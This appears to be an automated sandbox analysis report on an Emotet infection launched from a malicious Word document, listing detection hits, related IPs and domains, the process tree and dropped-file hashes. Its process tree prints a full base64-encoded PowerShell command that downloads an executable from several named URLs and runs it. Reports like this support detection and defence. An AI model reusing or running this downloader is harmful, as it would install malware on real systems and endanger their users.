11.2.sortedwatched.exe.5b3000.2.raw.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
10.1.sortedwatched.exe.400000.0.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
5.1.982.exe.400000.0.raw.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
4.2.982.exe.523000.2.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x611:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
6.2.982.exe.493000.2.raw.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
9.2.sortedwatched.exe.5a3000.2.raw.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
12.1.sortedwatched.exe.400000.0.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
10.1.sortedwatched.exe.400000.0.raw.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
12.2.sortedwatched.exe.400000.0.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
5.1.982.exe.400000.0.unpack	Emotet	detect Emotet in memory	JPCERT/CC Incident Response Group	0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
149.167.86.174	http://psicologiagrupal.cl/wp-admin/FILE/eSzL4nhVV/	Get hash	malicious	Browse
	DZB_V176H033B3E4VU_LN.doc	Get hash	malicious	Browse
	2019_04- Balance & Payment Report.doc	Get hash	malicious	Browse
	2019_04- Balance & Payment Report.doc	Get hash	malicious	Browse
	32DOCO214512852.js	Get hash	malicious	Browse
198.49.65.242	Attachment-8713-G777079.doc	Get hash	malicious	Browse	urbandogscol.com/wp-content/xiqjp4/
	Attachment-8713-G777079.doc	Get hash	malicious	Browse	urbandogscol.com/wp-content/xiqjp4/
	Attachment-8713-G777079.doc	Get hash	malicious	Browse	urbandogscol.com/wp-content/xiqjp4/
181.164.8.25	DZB_V176H033B3E4VU_LN.doc	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
sabiosdelamor.co	DZB_V176H033B3E4VU_LN.doc	Get hash	malicious	Browse	198.49.65.242
sabiosdelamor.co	DZB_V176H033B3E4VU_LN.doc	Get hash	malicious	Browse	198.49.65.242

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	Invoice0186.pdf	Get hash	malicious	Browse	192.168.0.40
	P_2038402.xlsx	Get hash	malicious	Browse	192.168.0.44
	bad.pdf	Get hash	malicious	Browse	192.168.0.44
	RFQ.pdf	Get hash	malicious	Browse	192.168.0.44
	100323.pdf	Get hash	malicious	Browse	192.168.0.44
	Copy.pdf	Get hash	malicious	Browse	127.0.0.1
	2.exe	Get hash	malicious	Browse	192.168.0.40
	UPPB502981.doc	Get hash	malicious	Browse	192.168.0.44
	Adm_Boleto.via2.com	Get hash	malicious	Browse	192.168.0.40
	00ECF4AD.exe	Get hash	malicious	Browse	192.168.0.40
	PDF_100987464500.exe	Get hash	malicious	Browse	192.168.0.40
	filedata.exe	Get hash	malicious	Browse	192.168.0.40
	.exe	Get hash	malicious	Browse	192.168.1.60
	33redacted@threatwave.com	Get hash	malicious	Browse	192.168.1.71
unknown	Invoice0186.pdf	Get hash	malicious	Browse	192.168.0.40
	P_2038402.xlsx	Get hash	malicious	Browse	192.168.0.44
	bad.pdf	Get hash	malicious	Browse	192.168.0.44
	RFQ.pdf	Get hash	malicious	Browse	192.168.0.44
	100323.pdf	Get hash	malicious	Browse	192.168.0.44
	Copy.pdf	Get hash	malicious	Browse	127.0.0.1
	2.exe	Get hash	malicious	Browse	192.168.0.40
	UPPB502981.doc	Get hash	malicious	Browse	192.168.0.44
	Adm_Boleto.via2.com	Get hash	malicious	Browse	192.168.0.40
	00ECF4AD.exe	Get hash	malicious	Browse	192.168.0.40
	PDF_100987464500.exe	Get hash	malicious	Browse	192.168.0.40
	filedata.exe	Get hash	malicious	Browse	192.168.0.40
	.exe	Get hash	malicious	Browse	192.168.1.60
	33redacted@threatwave.com	Get hash	malicious	Browse	192.168.1.71

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Your_Purchase_4396143.xls	Get hash	malicious	Browse	198.49.65.242
	Bofa_Charge01312019.xlsm	Get hash	malicious	Browse	198.49.65.242
	C_ACH_02042019.xlsm	Get hash	malicious	Browse	198.49.65.242
	C_ACH_02042019.xlsm	Get hash	malicious	Browse	198.49.65.242
	14308278291.xlsm	Get hash	malicious	Browse	198.49.65.242
	FILEY595000383.doc	Get hash	malicious	Browse	198.49.65.242
	FILEY595000383.doc	Get hash	malicious	Browse	198.49.65.242
	PO53473.doc	Get hash	malicious	Browse	198.49.65.242
	Facture_Num_OFH30703.doc	Get hash	malicious	Browse	198.49.65.242
	DOK97159672110.doc	Get hash	malicious	Browse	198.49.65.242
	vXZa4D4m4V.xls	Get hash	malicious	Browse	198.49.65.242
	Prepared_Purchase_Info_429458.doc	Get hash	malicious	Browse	198.49.65.242
	1704007#U682a#U5f0f#U4f1a#U793e04082.xls	Get hash	malicious	Browse	198.49.65.242
	62918504564317 .xls	Get hash	malicious	Browse	198.49.65.242
	571275114140SS .xls	Get hash	malicious	Browse	198.49.65.242
	Documento.FT.60803.modifiche_societarie.xls	Get hash	malicious	Browse	198.49.65.242
	Documento_081507_FT_20190415_0006009_.xls	Get hash	malicious	Browse	198.49.65.242
	Documento_057496_FT_20190415_0005008_.xls	Get hash	malicious	Browse	198.49.65.242
	Scanmalta Client Invoice Statements.xls	Get hash	malicious	Browse	198.49.65.242
	fee-docs.doc	Get hash	malicious	Browse	198.49.65.242

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\982.exe	DZB_V176H033B3E4VU_LN.doc	Get hash	malicious	Browse

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

WINWORD.EXE (PID: 3204 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)

powershell.exe (PID: 3456 cmdline: powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvAEAAaAB0AHQAcABzADoALwAvAGQAbwBnAG8AbgBnAHUAbABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAHYAYQBJAEQAZQB5AEQAagAvACcALgAiAHMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJABYAG4AOQBUAGoAcQBpAD0AJwBXADUANAA4AEcAUABiAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAaQBYAEgAaQBXACAAaQBuACAAJABFAEkAcABTAEcAdwB1ACkAewB0AHIAeQB7ACQAegBfAG4AZgAwADkALgAiAGQAYABvAHcAYABOAGAAbABPAEEARABGAEkAbABlACIAKAAkAEMAaQBYAEgAaQBXACwAIAAkAFEAegBpAEEAQgBCADYATAApADsAJABIAEkAaQBIAFcAVwBTAGYAPQAnAGoASAA4AG8ASQBNACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQB6AGkAQQBCAEIANgBMACkALgAiAGwAZQBOAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADMAOAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgB0ACIAKAAkAFEAegBpAEEAQgBCADYATAApADsAJABLAEMAYgBzAGoAawA9ACcAdwBBAHAATQB2AGEAYQAnADsAYgByAGUAYQBrADsAJAB2AGoAbAA4AFEATAB3AD0AJwBRADgAUAB6ADUAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADEAcwBhAEIAaAA9ACcAUQBpAEIANgA3AHIAaAA0ACcA MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

982.exe (PID: 3644 cmdline: 'C:\Users\user\982.exe' MD5: 3A74A93E7831D0953B5CEFB9C98505F1)

982.exe (PID: 3668 cmdline: 'C:\Users\user\982.exe' MD5: 3A74A93E7831D0953B5CEFB9C98505F1)

982.exe (PID: 3696 cmdline: --4e722ada MD5: 3A74A93E7831D0953B5CEFB9C98505F1)

982.exe (PID: 3600 cmdline: --4e722ada MD5: 3A74A93E7831D0953B5CEFB9C98505F1)

mscorsvw.exe (PID: 3528 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe MD5: BD2AE15EFB47E5215B4D0C59EA00C91A)

sortedwatched.exe (PID: 3732 cmdline: C:\Windows\system32\sortedwatched.exe MD5: 3A74A93E7831D0953B5CEFB9C98505F1)

sortedwatched.exe (PID: 3704 cmdline: C:\Windows\system32\sortedwatched.exe MD5: 3A74A93E7831D0953B5CEFB9C98505F1)

sortedwatched.exe (PID: 3672 cmdline: --2a75e385 MD5: 3A74A93E7831D0953B5CEFB9C98505F1)

sortedwatched.exe (PID: 3780 cmdline: --2a75e385 MD5: 3A74A93E7831D0953B5CEFB9C98505F1)

cleanup

Created / dropped Files

C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_041d84af-7e76-450d-8340-55db3c73c359 Download File
Process:	C:\Windows\System32\sortedwatched.exe
File Type:	data
Size (bytes):	2134
Entropy (8bit):	7.082471693816772
Encrypted:	false
MD5:	7B2759997F3D8E28C124D04DC495C0B5
SHA1:	30F9D822FC7B2A2E6A2EC1767949F739BF9CBC4C
SHA-256:	464553C0BA166E1C354DDC6477C6D466584F37E3367442B4653ACFA5D7234B7D
SHA-512:	57858DA819CB6F76C9F5CCAECDC06784F04960E39E78FEBA6E9CECBCC644B8242CE1DD90AB8919133DD789DFDF54A546CAE72EFA54F9E590ACBB013800CDCC43
Malicious:	false
Reputation:	low
Preview:	....................\...................SYSTEM.....................RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O........E...g@....V..$....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... .......6..h.N..Z....kN...G..$+..b............. ...r...........^...'-RoZM.#.^.S........O.W..$(.0.4/.v{$.{;..n........T..[..,....)...cB./(2.~...H\|.7..f..k...@...I..D?......zNJi...............g}d...6.h.QkW.Q.X...6...(]'.[G...0.\|.\.7..i{........p...``u.....$...B.c.h.....N........n...p.. .....D.p.?....NR.Vo\|.ef....x&.D. .`.....B.s].{...:.(.. ....(&..c9.x. ).s.-.D.S..C.^L....{...PHP...#..N..L.[.u.?N.....v..........M .S;0f...JZ6Wf.....P..).#....d`.=.Q..5Y&.o...@...h:..,.S+IGg4..p27..... !.Ci.W.s.J.uIu.$`2Vk.)...........{,.............z..O........E...g@....V..$........E.x.p.o.r.t. .F.l.a.g....f...... ....\|.Q.o..,Y..T.7W..\|..p.u....$x............ ..../.........]..+..C?.j.!vg..O..U....O.......Q-....&@

C:\Users\user\982.exe Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	425472
Entropy (8bit):	6.712476322966454
Encrypted:	false
MD5:	3A74A93E7831D0953B5CEFB9C98505F1
SHA1:	C74D84DE41D9294DA948D3CAACDDED254853E57C
SHA-256:	8743FB2C992EE623779B119C5BB06F9A523E2F335B0E64B8E133C4867295CE3C
SHA-512:	DA385FEAC0E13C7D8F4A7BECC92EDA980D160E0FF570F6193E111D3D5EB14B423CBC8329C146ECA01D27251B83DEB8E3ACE00FD3008935420B5767F1EE195290
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 16%, Browse
Joe Sandbox View:	Filename: DZB_V176H033B3E4VU_LN.doc, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...Z..HZ...Z..^Zu..Z..YZm..Z..IZ...Z..LZ...ZRich...Z........PE..L... k.].............................z............@..................................@............................................... ..z...........................................................05..@...................x...@....................text............................... ..`.rdata..............................@..@.data...Xj.......(..................@....rsrc...z.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13E77F69.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.286841866831989
Encrypted:	false
MD5:	8C3F121AF11549FD53782F48C92863D3
SHA1:	227F2DB68F6CF48489CF45B6253A95DA2AB0643F
SHA-256:	043D38B5DB46967F5D533DEB42B91BDF0273885C5CE262CA9C67A9A4A9983AF5
SHA-512:	09352127D65F17BF3BA277823DF7FB0A8150FA9C1558C25FF79D13759E33E022E6F17BB7309974E7E14CE75F21A63B22D9237193B6E2322C8E57C656BFB04F46
Malicious:	false
Reputation:	low
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...P....m#..I.u@..u..f!....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2236A463.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.2970430492936575
Encrypted:	false
MD5:	1D6F8498528BC890F9D1F7E62C97FC7F
SHA1:	B4632AAFC6219F49B64B317DB055F489FE4D9F45
SHA-256:	ABD26B7A339B79834B412075E175C9A5EABF5CA54A72DE1B8EA8AEA72B5973F2
SHA-512:	40A570353B9327B0FA9F9E70AD37959AF91181B67084FBA11E0A654BB812BFEBFC074A1DE08504A631A92A9AB9CB4E9DB4101934ADCEF1B22681A26E1DCDA5C1
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...0....m#..I.u@..u\.f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23282B10.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.186201474676835
Encrypted:	false
MD5:	33AA36BEF062419D9E597A3F8B74B112
SHA1:	26210D9DE88E70C17EC205BC721E9A36888D71E7
SHA-256:	DDFF1BFC68E7353E58F228892DBB3809CBCE1362F9512004E4814EB6F4716CF0
SHA-512:	905A7CFB5B9A09B3CDB7E937521776981E992D85BB13D0D0BF80F18B3BA533B54E5F67B1D3D2C0F98C4066FDF027ECBA9FF6AB0F8EEDE51B6ED6C596C911196F
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n...0....&.'.-v@.0vD.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C5693CD.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.2970430492936575
Encrypted:	false
MD5:	19A6FA2277408604E977C82E69985C8F
SHA1:	3CA249BFE7EC0692E32025F329D9C81711416607
SHA-256:	1B1F7FD642D4DE67EB37C28EBAB040F51B64009A14DB698678E78D6E2ED1BBE1
SHA-512:	0BDCCFD75065E1EDD3DBF1E478F9161225CCE52D539BD5E8187A7F7C1F5643867F695FA846B40076D667CB4C0A8125F01D35F2F27FFBFCCBF8786FE46EC12FC2
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DC6D560.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.19202389012249
Encrypted:	false
MD5:	0B2B1CB43D0C41B4DC860F15F9BE100B
SHA1:	EC12B6120297397176A0BCC923D451F8012AF73A
SHA-256:	17F15496F05D223F00CF474F82EBB6D8D2D8D4AEBEEA3270EED82C173B1CA89C
SHA-512:	DC14330EDCF351722B80A53E3F6B0F451B2363B64F8211B8972C7B89ECF5C45DF411327419723A348F79D71DB5B729556F2058E86A87634A049A3865504B262D
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v..f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E4E2F6A.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.1785803518075975
Encrypted:	false
MD5:	AE2B2DF9253D2FCC2C0E7C0050EA03EE
SHA1:	0D539A73FB33D7BB30AB74C159E5F264AC8E6D7D
SHA-256:	2F0B2BD8F4EB5C834A8AF7AE4F167780A8891F5CB9F8BE2DC0980CB71A3C331C
SHA-512:	023D37070C0C865BB58A09055D91DD59DCB1348C0B1670B9ED47C85D8C3BFA2ED47CD6433D87C36BC9D50C7B802367CB8BCD345EA9DB5BBF5FD8085B9879308B
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0vr.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\346B6F26.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.1958963691236155
Encrypted:	false
MD5:	C4B5A00071FB029B90FC7E2B39E29688
SHA1:	2DE333A3B6F71605D595634CC803F4E46694A6A6
SHA-256:	1A6C649A44DB791193674747E1B12AB2D6A5F8CCC495E7CD0D83EB2E2818C475
SHA-512:	E2F4ED6B4253A22C244F7BE373D45789A32DDB32B5F440209C4D192BC384C1E9A22B3435FACFCBBA5708E935BE9ED09D38F9C4B54D37DBE97C794483D5B895A1
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n....E....&.'.-v@.0v..f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3776ABB0.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.200681898780499
Encrypted:	false
MD5:	987EC44F0DB7F47F706543612DF34325
SHA1:	3B8282C9478FB02FF805BF793042B2C28C353B44
SHA-256:	8641D94B165FE092700CDAB44A372FDBD964864DDD1313D689BED48B35A9D942
SHA-512:	539484847795354DF9CEFE5DD6A369EB2814AF02B053E83A9793873734D42AE7611D1355964BBC5D100008B29486B6C39D1EE3D5FEA05891F8E6961DA2AAB690
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n....G....&.'.-v@.0vK.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B413F79.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.2908383477122083
Encrypted:	false
MD5:	69DC5CCF53E2015272464C3E0634038E
SHA1:	D958188C6CE14A46B02CFDF0B19CF6BB1D64D3B5
SHA-256:	30D93A5AEDD28B3BF5D7828D0B991FDE918DF1CF927884BB5ED9777984671D44
SHA-512:	3FEF8443735557F11CA78847EC0BA30613C5E5A90CC743FFE17933CB415706425272EFED07B8D0F1EBA5CB74FFFE3C595D22C49BAEEF576439EB181C5696DD51
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...1..8.#..I.u@..u..fu....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\420D0784.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.184567519044446
Encrypted:	false
MD5:	B22E6EC8E0F7CEBD01036702876D5F5B
SHA1:	0872D4936DB7DC87505AA59FD79807EEEDED6028
SHA-256:	53A55B993345813248369E7F03366D4F29583E250983BBF2EA33ED3AC30C8051
SHA-512:	7AFD1215CC94B8763E8DF26226480D06AB7B6DDF47CAEC7685AE39D6D3FF094D8BFC49AEB6AC0FFFA6360F582553804BF5A98A24D42A7E3C86F6F2F18916130B
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v@.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47489027.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.292538544789153
Encrypted:	false
MD5:	144E77ECF2566E5A422639AF02C91171
SHA1:	85B1E35F07F23204A55DAEA64CB2C2306F61E3E8
SHA-256:	56CE1776683DCBF6E6D57A0BD5C7E9EF07D50041D4380CC94A3EA64F98D3F988
SHA-512:	3D8D415595012AC051135E0673ABC6C812DE70626ABEA2B0D3FDAB692A24CD73CFDE9BF1DF071F28DB9E7E1CB64C60898F86A6DC2CD55924A0FF51C0856EA862
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...p....m#..I.u@..ug.f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\478BF9B5.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.2970430492936575
Encrypted:	false
MD5:	1925A1BA461D79FAAAC473B86C1FE95C
SHA1:	7D13CE9AAD6BC3A0538FBB40DBF0B305D97F1DC5
SHA-256:	D9F295FC18196019436E4B0C3B71AB3E671490A3EEA8DF9093A2C36B17D8938E
SHA-512:	194A10B4739F5D4F54CA448463CE6D4B4B92D3EAB81C941D1404C2994969196D2952C54F1ACE4584CEF23B2FC43B203E4085992478428DDA454E76B3E5653781
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...`7...m#..I.u@..u..f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47B60BD2.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.1876948857934857
Encrypted:	false
MD5:	F2C10C9F1A817B04C3CB759A2ECE74DD
SHA1:	5B89CAA941D6F60695D8F2DFFCFE014360635379
SHA-256:	D7C8C67A2F815FB2AD5C7CAC5C3AAB1B6A7884ED9D11A4AFF0CFA0452CDB113E
SHA-512:	2C21AEE4341046480F1CC9EC7D145356493FDD1B0474E9338C1BC6C514DF89AFFE1F932C4511FBE0B97DE5E2DDEECAA86A0FF04210E5788E27FCEE4EDB2C6D32
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n....G....&.'.-v@.0vo.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5273C8EF.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.288034040284648
Encrypted:	false
MD5:	34E5E0AF9BEB16046D5BDA5910A5D365
SHA1:	C36E97C5E1AA454763880A55606E307332AF8156
SHA-256:	AC92552BB32517C7166814787D764EE5CC593772707162A031E9139445B1347F
SHA-512:	4A23EEA03E259FBBF50A75E7767C76C054DFA64D55E925885BD90EBFDBCE9B3B5388D8BF20E11BCB32B939D9153FC95A1F8125BDBA709BDBC1BD2B0ACB533C7E
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...0....m#..I.u@..u;.fS....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\547645AB.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.2970430492936575
Encrypted:	false
MD5:	C74440B1595AAB4849058E1E290D9D6D
SHA1:	E135C229620EA086DBAE3A17689C5DD544CAA9FE
SHA-256:	DB0298A56DA72017CF13281E2465A4B4095F43FA11FF1AE339671045A279D200
SHA-512:	E489F64BFAFF5D614E2287E37BDAC8C22899C1522F081B787289EE3BA727DF769386A2501772EC7E67C4F7A7D516ADE2E01824BD050F2337A2E6076ACA126E59
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\592348AC.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.170147126883901
Encrypted:	false
MD5:	3934D3DBA41B871D94194A81F9770D15
SHA1:	75BD83B5C542B4510C871D788867335FF9E7F61C
SHA-256:	F2394A106AA6D4ACC3A297DCFDC9958355E3C824450878DA358E0E407E427F9F
SHA-512:	DF33971396B7FEAB54DB8AE33E01DFC82357A591263ED0429687117F59CDD677888C37752C91EF64AB47D3003CD15B3BC2C1026548D0ABF0497D58639B378D85
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v9.f.....-.................'...........................

